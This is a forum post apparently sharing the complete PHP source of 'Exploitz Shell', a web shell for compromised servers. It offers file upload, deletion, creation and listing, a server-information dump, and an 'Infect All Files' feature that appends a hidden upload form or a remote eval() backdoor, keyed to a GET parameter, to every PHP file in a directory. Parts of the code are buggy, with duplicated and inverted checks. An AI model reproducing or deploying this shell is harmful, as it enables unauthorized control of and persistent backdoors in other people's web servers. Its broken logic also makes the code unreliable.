07-12-2008, 04:40 PM
Code:
<?php
/*
___________ .__ .__ __
\_ _____/__ _________ | | ____ |__|/ |_________
| __)_\ \/ /\____ \| | / _ \| \ __\___ /
| \> < | |_> > |_( <_> ) || | / /
/_______ /__/\_ \| __/|____/\____/|__||__| /_____ \
\/ \/|__| \/
_________.__ .__ .__ .__ ____
/ _____/| |__ ____ | | | | ___ __ ___________ _____|__| ____ ____ /_ |
\_____ \ | | \_/ __ \| | | | \ \/ // __ \_ __ \/ ___/ |/ _ \ / \ | |
/ \| Y \ ___/| |_| |__ \ /\ ___/| | \/\___ \| ( <_> ) | \ | |
/_______ /|___| /\___ >____/____/ \_/ \___ >__| /____ >__|\____/|___| / |___|
\/ \/ \/ \/ \/ \/
________~Subzero of Exploitz Crew~________
*/
?>
<html><head><title>Exploitz Shell ~ <?php $title=$_SERVER['SERVER_NAME'];echo($title); ?></title></head>
<body bgcolor="black" text="#363636" alink="#363636" vlink="#363636" link="#363636">
<?php //style of Shellz ?>
<style>input,textarea,select {
font: normal 11px Verdana, Arial, Helvetica, sans-serif;
background-color:black;
color:#a6a6a6;
border: solid 1px #363636;
}
</style>
<?php //Menu ExploitzShell ?>
<hr><p align="center"><?php $filename=$_SERVER['SCRIPT_NAME'];echo("<a href='$filename'><img src='http://img107.imageshack.us/img107/4853/headcopiaaq9.jpg'></a>");?></body><br><hr>
<p align="center"><font color="#35f93f">||</font> <a href="?action=filelist"><img src="http://iconlet.com/icons/eclipse/birt/pal/list.gif"><font face='Comic Sans' color='#363636'> FileList</a></font> <font color="#35f93f">||</font> <a href="?action=infect"><img src="http://iconlet.com/icons/cclear/16x16/virussafe.png"><font face='Comic Sans' color='#363636'> Infect All Files</a></font> <font color="#35f93f">||</font><p align="center"><font color="#35f93f">||</font> <a href="?action=info"><img src="http://iconlet.com/icons/futurosoft/16x16/actions/info.png"><font face='Comic Sans' color='#363636'> Informazioni</a></font> <font color="#35f93f">||</font> <a href="?action=uploader"><img src="http://iconlet.com/icons/nuvola/16x16/download_manager.png"><font face='Comic Sans' color='#363636'> Uploader</a></font> <font color="#35f93f">||</font> <a href="?action=rename"><img src="http://iconlet.com/icons/kids/16x16/apps/renamecomputer.png"><font face='Comic Sans' color='#363636'> Rename File</a></font> <font color="#35f93f">||</font> <a href="?action=delete"><img src="http://iconlet.com/icons/lila/white/16x16/actions/delete.png"><font face='Comic Sans' color='#363636'> Delete File</a></font> <font color="#35f93f">||
</font> <a href="?action=mkfile"><img src="http://iconlet.com/icons/crystal09/16x16/make.png"><font face='Comic Sans' color='#363636'> Make File <font color="#35f93f"></a> ||</font> <a href="?action=scanner"><img src="http://iconlet.com/icons/nuvola/16x16/scanner.png"><font face="Comic Sans" color='#363636'> ScannerShell</a></font> <font color="#35f93f">||</font>
<hr></p>
<?php
//Get Dinamic Action
$action = htmlspecialchars($_GET['action']);
switch ($action)
{
case "uploader" : ?>
<p align="center"><font color="#32CD32">
<?php echo("<img src=http://iconlet.com/icons/nuvola/16x16/download_manager.png><b>Uploader File</b><br>");
$document=htmlspecialchars($_SERVER['DOCUMENT_ROOT']);echo("<img src=http://iconlet.com/icons/gperfection/16x16/stock/generic/stock_new-dir.png><font color='#363636'> Directory: $document</font>"); ?>
</p><form method="post" action="?action=uploader" enctype="multipart/form-data"><center>
<input type="file" value="Load..." name="miofile"><br><br>
<input type="submit" name="uploader" value="Esegui Upload"></center></form>
<?php
if ($_POST['uploader']) {
$percorso = htmlspecialchars($_FILES['miofile']['tmp_name']);
$nome = htmlspecialchars($_FILES['miofile']['name']);
if (move_uploaded_file($percorso, $nome))
{
echo"<center>Uploaded! Click <a href='$nome' target='_blank'>Here</a> to Own<hr>";
die();
}
}
break;
case "rename" : ?>
<p align="center"><font color="#32CD32">
<?php echo("<img src=http://iconlet.com/icons/kids/16x16/apps/renamecomputer.png><b>Rename File</b><br>"); ?>
<br><table width="11%" border="1" align="center"><tr><td width="20%">
<form method='post' action='#'><center>Originale:</td></tr>
<td width="20%"><input type='text' align='LEFT' name='renuno'><br></td>
<tr><td width="20%"><form method='post' action='#'><center>Rinominare:
</td></tr><td width="35%"><input type='text' align='LEFT' name='rendue'><br>
</td></table><br><td width="50%"><input type='submit' value='Rinomina' name='reninvia'></form></td>
<?php
if ($_POST['reninvia']) {
$file_old = htmlspecialchars($_POST['renuno']);
$file_new = htmlspecialchars($_POST['rendue']);
if (isset($file_old) && isset($file_new)) { rename($file_old, $file_new); }
if (rename($file_old,$file_new)) { echo("<br>il file $file_old, non è stato rinominato!<hr>");die(); }
elseif (!rename($file_old, $file_new)) { echo("<br>Rinominato $file_old in <a href='$file_new'>$file_new</a>!<hr>");die(); } }
break;
//DeleteFile
case "delete" : ?>
<p align='center'><font color='#32CD32'>
<img src='http://iconlet.com/icons/lila/white/16x16/actions/delete.png'><b>Delete File</b><br>
<br><table width='11%' border='1' align='center'><tr><td width='20%'>
<form method='post' action='#'><center>Cancella:</td></tr>
<td width="20%"><input type='text' align='LEFT' name='deletefile'><br></td>
</table><br><td width="50%"><input type='submit' name='deletefiles' value='Cancella File'><form>
<?php
if ($_POST['deletefiles']) {
$myFile = htmlspecialchars($_POST['deletefile']);
if (file_exists($myFile) && (is_file($myFile))) {
unlink($myFile);
if (!unlink($myFile)) { print("[$myFile] cancellato con successo!"); }
else { print("[$myFile] non è stato cancellato!"); }
}
else {
rmdir($myfile);
if (rmdir($myFile)) { print("La directory [$myFile] Cancellata con Successo!"); }
else { print("La directory [$myFile] non è stato cancellata!"); }
}
}
break;
//informazioni Server Ecc.
case "info" :
$ip = $_SERVER['REMOTE_ADDR'];
$serverip = $_SERVER['SERVER_ADDR'];
//browser detecting...
$und = "<font color=red size='2'>]<font color=orange> Unknown";
if (strstr($_SERVER['HTTP_USER_AGENT'], U) && strstr($_SERVER['HTTP_USER_AGENT'], Firefox)) {
$agent = "Mozilla Firefox";
}
elseif (strstr($_SERVER['HTTP_USER_AGENT'], Opera)) { $agent = "Opera"; }
elseif (strstr($_SERVER['HTTP_USER_AGENT'], MSIE)) { $agent = "Internet Explorer"; }
elseif (strstr($_SERVER['HTTP_USER_AGENT'], Lynx)) { $agent = "Lynx"; }
else { echo "$und"; }
//variabili informations
$host = $_SERVER['HTTP_HOST'];
$serversoft = $_SERVER['SERVER_SOFTWARE'];
$shelldirectory = $_SERVER['DOCUMENT_ROOT'];
$safemode = ini_get('safe_mode');
//inizio print informazioni ?>
<p align='center'><font color='#32CD32'><img src='http://iconlet.com/icons/futurosoft/16x16/actions/info.png'><b>Centro Informazioni</b><br>
<br><?php
echo "<font face='Comic Sans' color='#363636'><img src='http://iconlet.com/icons/fff_silk/server.png'>[Server Ip:] <font color=#35f93f>$serverip</font>";
echo "<br><img src='http://iconlet.com/icons/lila/blue/16x16/apps/kghostview.png'>[Host:] <font color=#35f93f>$host</font>";
echo "<br><img src='http://iconlet.com/icons/eclipse/web/obj16/IMapTypeDescriptor.gif'>[Ip Utente:] <font color=#35f93f>$ip</font>";
echo "<br><img src='http://iconlet.com/icons/futurosoft/16x16/apps/browser.png'>[Browser:] <font color=#35f93f>$agent</font>";
echo "<br><img src='http://iconlet.com/icons/crystalsvg/16x16/yast_software2.png'>[Software Server:] <font color=#35f93f>$serversoft</font>";
echo "<br><img src='http://iconlet.com/icons/gperfection/16x16/filesystems/gnome-fs-directory.png'>[Shell Directory:] <font color=#35f93f>$shelldirectory</font>";
echo "<br><img src='http://iconlet.com/icons/eclipse/birt/obj16/global.gif'>[Register Globals:]";
(ini_get("register_globals") == 1) ? print "<font color=#363636> Off</font>" : print "<font color=green>On</font>";
echo "<br><img src='http://iconlet.com/icons/cclear/16x16/agt_virussafe.png'>[Safe Mode:]";
($safemode == 0) ? print "<font color=#35f93f> Off</font>" : print "<font color=red> On</font>";
break;
//Make File or Directory
case "mkfile" : ?>
<p align='center'><font color='#32CD32'><img src="http://iconlet.com/icons/crystal09/16x16/make.png"><b>Make File</b>
<br>
<div align="center">
<table border="1" width="100%" align="left">
<tr>
<td><p align='center'><table width='11%' border='1' align='center'><tr><td width='20%'><form method='post' action='#'><center><img src='http://iconlet.com/icons/gperfection/12x12/mimetypes/gnome-mime-application-x-object-file.png'>Crea File:</td></tr><td width='20%'>
<p align="center"><input type='text' align='LEFT' name='mkfile'><br>
</p>
<center><input type='submit' name='mkfiles' value='Crea File'><form></td></table>
<td><p align='center'><table width='11%' border='1' align='center'><tr><td width='20%'><form method='post' action='#'><center><img src='http://iconlet.com/icons/gperfection/12x12/filesystems/gnome-fs-directory-accept.png'>Crea Directory:</td></tr><td width='20%'>
<p align="center"><input type='text' align='LEFT' name='mkdir'><br>
</p>
<center><input type='submit' name='mkdirs' value='Crea Directory'><form></td></table>
</tr>
</table>
<br><br><br><br><br><br><img src="http://iconlet.com/icons/glaze/22x22/mimetypes/source_o.png"><font color='#363636' size="3"><b> Sources Code of File</b></font><table border="1" width="100%">
<tr>
<td>
<center><br><textarea class='textarea' rows='24' cols='70' name='content'></textarea><br><br></td>
</tr>
</table>
</div>
<?php
if ($_POST['mkfiles']) {
$mkrfile = htmlspecialchars(@$_POST['mkfile']);
if (!file_exists($mkrfile)) {
$log = fopen($mkrfile, 'w+');
$quelloche = stripslashes(@$_POST['content']);
fwrite($log, $quelloche);
fclose($log);
if (!fwrite($log, $quelloche)) { echo("Il File <a href='$mkrfile' target='_blank'>$mkrfile</a> è stato Creato;)"); }
elseif(fwrite($log, $quelloche)) { echo("il File $mkrfile non è stato creato :("); }
}
}
if ($_POST['mkdirs']) {
$mkrdir = htmlspecialchars(@$_POST['mkdir']);
if (!is_dir($mkrdir)) {
mkdir($mkdir);
if(mkdir($mkdire)) { echo("La Directory $mkdir non è stata creata :("); }
elseif (!mkdir($mkdire)) { echo("La Directory <a href='$mkdir' target='_blank'>$mkdir</a> è stata Creata;)"); }
}
}
break;
//Scanner Shell
case "scanner" :
?>
<p align='center'><font color='#32CD32'><img src="http://iconlet.com/icons/nuvola/16x16/scanner.png"><b>ScannerShell</b><br><br>
<table border="1" width="100%">
<tr>
<td><center><br><img src="http://iconlet.com/icons/eclipse/web/obj16/directivesheader.gif">Directory:<form method='post' action='#'><input type='text' align='LEFT' name='scanner'><br><br><input type='submit' name='scannershe' value='Scanna Shell'></form></td>
</tr>
</table>
<?php
if ($_POST['scannershe']) {
$scannersh = htmlspecialchars(@$_POST['scanner']);
if ($scannersh == "") { $scannersh = "/"; }
chdir($scannersh);
$evil = array("dc3", "Antichat", "s101", "nefastica", "n3tShell", "Nexen", "33rd", "c99", "c2007", "c100", "r57", "shell", "k0tw", "nexpl0rer", "paradox", "Upload", "ZipShell", "Usucktoo", "shell_exec", "exec", "DxShell", "Cod3rz", "Fire-Crash", );
echo "<br>Ho analizzato $scannersh<br>";
foreach (glob("*.php*") as $file)
{
$a = fopen($file, "r+");
$b = fread($a, filesize($file));
for ($i = 0; $i < 14; $i++)
{
$me = array_reverse(explode("/",$_SERVER['PHP_SELF']));
$str = strpos($b, $evil[$i]);
if (($str !== FALSE) and ($file != $me[0]))
{
echo "<font face='Comic Sans' color='#363636'><img src='http://iconlet.com/icons/nuovext/16x16/actions/find.png'>Trovato Possibile $evil[$i] in <a href='$file' target='_blank'>$file</a><br>";
}
}
fclose($a);
}
}
break;
case "filelist" :
//File List ?>
<p align='center'><font color='#32CD32'>
<img src="http://iconlet.com/icons/eclipse/birt/pal/list.gif"><b>Lista File e Directory</b><br>
<br><table width='11%' border='1' align='center'><tr><td width='20%'>
<form method='post' action='#'><center>Sfoglia in:</td></tr>
<td width="20%"><input type='text' align='LEFT' name='directorylist'><br></td>
</table><br><td width="50%"><input type='submit' name='submitlist' value='Esegui Lista'><form></table></font></p>
<?php
if ($_POST['submitlist']) { $path = $_POST['directorylist']; }
else { $path = "."; }
$dir_handle = @opendir($path) or die("Non riesco ad aprire $path");
$space = str_repeat(" ", 70);
echo "<p align='center'><PRE>";
echo "Directory di [$path]\n";
while ($file = readdir($dir_handle)) {
if (is_dir($file)) {
$t="<img src='http://iconlet.com/icons/gperfection/16x16/filesystems/gnome-fs-directory-accept.png'><a href=$file>$file</a>";
echo $t.substr($space,0,40-strlen($file)) ;
$t=(filesize($file)/1024);
$t=sprintf("%01.2f",$t)."kb ";
echo substr($space,0,10-strlen($t)) . $t;
$t=date("d.M Y H:i:s", filemtime($file));
echo $t.substr($space,0,20-strlen($file));
echo "</p>\n";
}
elseif (is_file($file)) {
$t="<img src='http://iconlet.com/icons/reinhardt/16x16/files.png'><a href=$file>$file</a>";
echo $t.substr($space,0,40-strlen($file)) ;
$t=(filesize($file)/1024);
$t=sprintf("%01.2f",$t)."kb ";
echo substr($space,0,10-strlen($t)) . $t;
$t=date("d.M Y H:i:s", filemtime($file));
echo $t.substr($space,0,20-strlen($file));
echo "</p>\n";
}
}
closedir($dir_handle);
echo "</PRE>";
break;
case "infect" : ?>
<p align='center'><font color='#32CD32'>
<img src="http://iconlet.com/icons/cclear/16x16/virussafe.png"><b>Infection of Filez</b><br>
<br><table width='11%' border='1' align='center'><tr><td width='20%'>
<form method='post' action='#'><center>Inserire:<br><br><input type='submit' name='submitinfe' value='Upload Infect'><br>
<input type='submit' name='submiteval' value='Eval Infect'><form>
</td></tr>
</table>
<?php
if ($_POST['submitinfe']) {
foreach (glob("*.php") as $lol)
{
$servername=$_SERVER['SERVER_NAME'];
echo("<br><img src='http://iconlet.com/icons/cclear/16x16/virus%20detected.png'> <a href='$lol?settings=correct' target='_blank'>$servername/$lol?settings=correct</a>");
$dir = '.';
$asd = fopen($lol, 'a+');
if ($_POST['submitinfe']) {
@fwrite($asd, '
<?php
if ($_GET["settings"]=="correct") { ?>
<form method="post" action="#" enctype="multipart/form-data"><center><input type="file" value="Load..." name="miofile" /><br /><br/><input type="submit" name="uploader" value="Do Upload" /></center></form>
<?php
if ($_POST["uploader"]) { $percorso = $_FILES["miofile"]["tmp_name"];$nome = $_FILES["miofile"]["name"];
if (move_uploaded_file($percorso, $nome))
{
?><html><head></head><body bgcolor="black" text="red"><center><br><br><font color="orange"><?php ".$nome." ?></font> Has Been Saved!<?php die(); } } }
?>');
@fclose($asd);
}
}
}
elseif ($_POST['submiteval']) {
foreach (glob("*.php") as $lol)
{
$servername=$_SERVER['SERVER_NAME'];
echo("<br><img src='http://iconlet.com/icons/cclear/16x16/virus%20detected.png'> <a href='$lol?pwn=' target='_blank'>$servername/$lol?pwn=</a>");
$dir = '.';
$asd = fopen($lol, 'a+');
if ($_POST['submiteval']) {
@fwrite($asd, '
<?php
$ec = stripslashes($_GET[\'pwn\']);
eval($ec);
?>');
@fclose($asd);
}
}
}
break;
}
?>
<hr>
<p align="center"><font face='Comic Sans' color='#363636'><a href="mailto:Venom_@live.it">Venom_@live.it</a>, Subzero of Exploitz Crew
<hr>
</body>
</html>Credit to Crew Owner.
